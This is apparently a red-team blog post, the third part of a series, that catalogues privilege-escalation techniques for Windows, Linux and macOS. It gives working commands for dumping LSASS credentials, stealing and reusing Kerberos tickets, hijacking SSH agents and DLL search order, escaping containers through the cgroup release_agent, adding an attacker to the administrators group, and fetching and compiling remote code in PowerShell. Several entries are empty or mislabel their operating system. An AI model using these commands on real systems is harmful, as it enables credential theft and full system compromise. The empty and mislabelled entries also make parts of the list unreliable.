Start Right now!

43 Methods for Privilege Escalation (Part 3)

In this article, we continue the article 43 methods for privilege escalation. If you haven't read the previous part yet, visit the blog.
  • Category: Red Team
What is privilege escalation article featured image?

Read In This Article

If you are not yet familiar with the concept of privilege escalation, you can refer to article 43 Privilege Escalation Methods.

Dump lsass with SilentProcessExit

Domain: No

Local Admin: Yes

OS: Windows

Type:  Enumeration & Hunting

Methods: 

  1. SilentProcessExit.exe pid

Lsass Shtinkering

Domain: No

Local Admin: Yes

OS: Windows

Type:  Enumeration & Hunting

Methods: 

  1. HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->2
  2. LSASS_Shtinkering.exe pid

AndrewSpecial

Domain: No

Local Admin: Yes

OS: Windows

Type:  Enumeration & Hunting

Methods: 

  • AndrewSpecial.exe

CCACHE ticket reuse from /tmp

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunting

Methods: 

  • ls /tmp/ | grep krb5cc_X
  • export KRB5CCNAME=/tmp/krb5cc_X

CCACHE ticket reuse from keyring

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunting

Methods: 

  • https://github.com/TarlogicSecurity/tickey
  • /tmp/tickey -i

CCACHE ticket reuse from SSSD KCM

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunting

Methods: 

  • git clone https://github.com/fireeye/SSSDKCMExtractor
  • python3 SSSDKCMExtractor.py –database secrets.ldb –key secrets.mkey

CCACHE ticket reuse from keytab

Domain: Yes

Local Admin: Yes

OS: Linux/Windows/Mac

Type:  Enumeration & Hunting

Methods: 

  • git clone https://github.com/its-a-feature/KeytabParser
  • python KeytabParser.py /etc/krb5.keytab
  • klist -k /etc/krb5.keytab

Or

  • klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
  • python3 keytabextract.py krb5.keytab
  • ./bifrost -action dump -source keytab -path test

SSH Forwarder

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunting

Methods: 

  • ForwardAgent yes
  • SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston

AppleScript

Domain: No

Local Admin: Yes

OS: Windows

Type:  Enumeration & Hunt

Methods: 

  • (EmPyre) > listeners
  • (EmPyre: listeners) > set Name mylistener
  • (EmPyre: listeners) > execute
  • (EmPyre: listeners) > usestager applescript mylistener
  • (EmPyre: stager/applescript) > execute

DLL Search Order Hijacking

Domain: No

Local Admin: Yes

OS: Windows

Type:  Hijack

Methods: 

  • https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie
  • Brownie

Slui File Handler Hijack LPE

Domain: No

Local Admin: Yes

OS: Windows

Type:  Hijack

Methods: 

  • https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation
  • Slui.exe

CDPSvc DLL Hijacking

Domain: No

Local Admin: Yes

OS: Windows

Type:  Hijack

Methods: 

  • Cdpsgshims.exe

Magnify.exe Dll Search Order Hijacking

Domain: No

Local Admin: Yes

OS: Windows

Type:  Hijack

Methods: 

  • copy payload dll as igdgmm64.dll to SYSTEM path %PATH% which is writeable such as C:\python27
  • Press WinKey+L
  • Press Enter
  • Press WinKey++(plusKey) on login screen which show password box.
  • then payload dll will execute as SYSTEM access.

CdpSvc Service 

Domain: No

Local Admin: Yes

OS: Windows

Type:  Hijack

Methods: 

  • Find Writable SYSTEM PATH with acltest.ps1 (such as C:\python27)
  • C:\CdpSvcLPE> powershell -ep bypass “. .\acltest.ps1”
  • Copy cdpsgshims.dll to C:\python27
  • make C:\temp folder and copy impersonate.bin to C:\temp
  • C:\CdpSvcLPE> mkdir C:\temp
  • C:\CdpSvcLPE> copy impersonate.bin C:\temp
  • Reboot (or stop/start CDPSvc as an administrator)
  • cmd wil prompt up with nt authority\system.

HiveNightmare

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  0/1 Exploit

Methods: 

  • HiveNightmare.exe 200

CVE-2021-30655

Domain: No

Local Admin: Yes

OS: Windows

Type:  0/1 Exploit

Methods: 

  • https://github.com/thehappydinoa/rootOS
  • Python rootOS.py

CVE-2019-8526

Domain: No

Local Admin: Yes

OS: Mac

Type:  0/1 Exploit

Methods: 

CVE-2020-9771

Domain: No

Local Admin: Yes

OS: Mac

Type:  0/1 Exploit

Methods: 

CVE-2021-3156

Domain: No

Local Admin: Yes

OS: Mac

Type:  0/1 Exploit

Methods: 

CVE-2018-4280

Domain: No

Local Admin: Yes

OS: Mac

Type:  0/1 Exploit

Methods: 

  • https://github.com/bazad/launchd-portrep
  • ./launchd-portrep ‘touch /tmp/exploit-success’=

Abusing with FileRestorePrivilege

Domain: Y/N

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • poptoke.exe

Abusing with RestoreAndBackupPrivileges

Domain: Y/N

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • poptoke.exe

Abusing with ShadowCopyBackupPrivilege

Domain: Y/N

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • poptoke.exe

Abusing with ShadowCopy

Domain: Y/N

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • poptoke.exe

Dynamic Phishing

Domain: Y/N

Local Admin: Yes

OS: Mac

Type:  Phish

Methods: 

  • https://github.com/thehappydinoa/rootOS
  • Python rootOS.py

Race Conditions

Domain: No

Local Admin: Yes

OS: Windows

Type:  Race Condition

Methods: 

  • echo “net localgroup administrators attacker /add” > C:\temp\not-evil.bat
  • tempracer.exe C:\ temp\*.bat

Abusing usermode helper API

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  • d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
  • mkdir -p $d/w; echo 1 > $d/w/notify_on_release
  • t=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab`
  • touch /o; echo $t/c > $d/release_agent
  • echo “#!/bin/sh” > /c
  • echo “ps > $t/o” >> /c
  • chmod +x /c
  • sh -c “echo 0 > $d/w/cgroup.procs”; sleep 1
  • cat /o

Escape only with CAP_SYS_ADMIN capability

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  • mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
  • echo 1 > /tmp/cgrp/x/notify_on_release
  • host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab`
  • echo “$host_path/cmd” > /tmp/cgrp/release_agent
  • echo “#!/bin/sh” > /cmd
  • echo “ps aux > $host_path/output” >> /cmd
  • chmod a+x /cmd
  • sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”
  • cat /output

Abusing exposed host directories

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  • mknod /dev/sdb1 block 8 17
  • mkdir /mnt/host_home
  • mount /dev/sdb1 /mnt/host_home
  • echo ‘echo “Hello from container land!” 2>&1’ >> /mnt/host_home/eric_chiang_m/.bashrc

Unix Wildcard

Domain: No

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

  • python wildpwn.py –file /tmp/very_secret_file combined ./pwn_me/

Socket Command Injection

Domain: No

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

  • echo “cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;” | socat – UNIX-CLIENT:/tmp/socket_test.s

Logstash

Domain: No

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

  • /etc/logstash/logstash.yml
  • input {

exec {

           command => “whoami”

           interval => 120

           }

      }

UsoDllLoader

Domain: No

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

  • UsoDllLoader.exe

Trend Chain Methods for Privilege Escalation 

Habanero Chilli

Domain: No

Local Admin: Yes

OS: Windows

Type:  Dll Side-loading

Methods: 

  • rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Padron Chilli

Domain: Y/N

Local Admin: Yes

OS: Windows

Type:  Create a Reflective DLL Injector + Reflective DLL for dump lsass memory without touch hard disk

Methods: 

  • #.\inject.x64.exe <Path to reflective dll: .\LsassDumpReflectiveDLL.dll>

Jalapeno Chillies

Domain: Yes

Local Admin: Yes

OS: Windows

Methods:  unhook NTDLL.dll + dump the lsass.exe as WindowsUpdateProvider.pod

Methods: 

  • NihilistGuy.exe

Pasilla Chili

Domain: Yes

Local Admin: Yes

OS: Windows

Methods:  SeImpersonatePrivilege + Abusing Service Account Session

Methods: 

Finger Chilli

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing PrintNotify Service + DLL side-loading

Methods: 

  • As an administrator, copy winspool.drv and mod-ms-win-core-apiquery-l1-1-0.dll to C:\Windows\System32\spool\drivers\x64\3\
  • Place all files which included in /bin/ into a same directory.
  • Then, run powershell . .\spooltrigger.ps1.
  • Enjoy a shell as NT AUTHORITY\SYSTEM.

Orange Cayenne

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Silver Ticket + I Know

Methods: 

Red Cayenne

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Silver ticket + User to User Authentication

Methods: 

Birds Eye Chilli

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Silver Ticket + Buffer Type Confusion

Methods: 

Scotch Bonnet

Domain: Yes

Local Admin: Yes

OS: Windows

Type:   Bring Your Own KDC

Methods: 

Lemon Habanero

Domain: No

Local Admin: Yes

OS: Linux

Type:  Capabilities

Methods: 

  • gcc -Wl,–no-as-needed -lcap-ng -o ambient ambient.c
  • sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
  • ./ambient /bin/bash

Red Habanero

Domain: No

Local Admin: Yes

OS: Windows

Type:   NtSetInformationProcess + DLL side-loading

Methods: 

  • BypassRtlSetProcessIsCritical.exe pid

Ghost Pepper

Domain: No

Local Admin: Yes

OS: Windows

Type:   allow low privileged user accounts to create file system and registry symbolic links

Methods: 

  • PS C:\> $code = (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content
  • PS C:\> Add-Type $code                                                                                          
  • PS C:\> $s = New-Object de.usd.SharpLink.Symlink(“C:\Users\Public\Example\link”, “C:\ProgramData\target.txt”)
  • PS C:\> $s.Open()
  • PS C:\> echo “Hello World :D” > C:\Users\Public\Example\link
  • PS C:\> type C:\ProgramData\target.txt
  • Hello World 😀
  • PS C:\> $s.Close()

Chocolate Scorpion Chilli

Domain: No

Local Admin: Yes

OS: Windows

Type:   Directory-Deletion + Windows Media Player d/s

Methods: 

  • https://github.com/sailay1996/delete2SYSTEM
  • .\poc.ps1

Carolina Reaper

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Creates an arbitrary service + PTH

Methods: 

The Intimidator Chilli

Domain: No

Local Admin: Yes

OS: Windows

Type:  manipulate memory/process token values/NT system calls and objects/NT object manager

Methods: 

  • https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
  • Import-Module NtObjectManager
  • Get-ChildItem NtObject:\
  • NT*

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.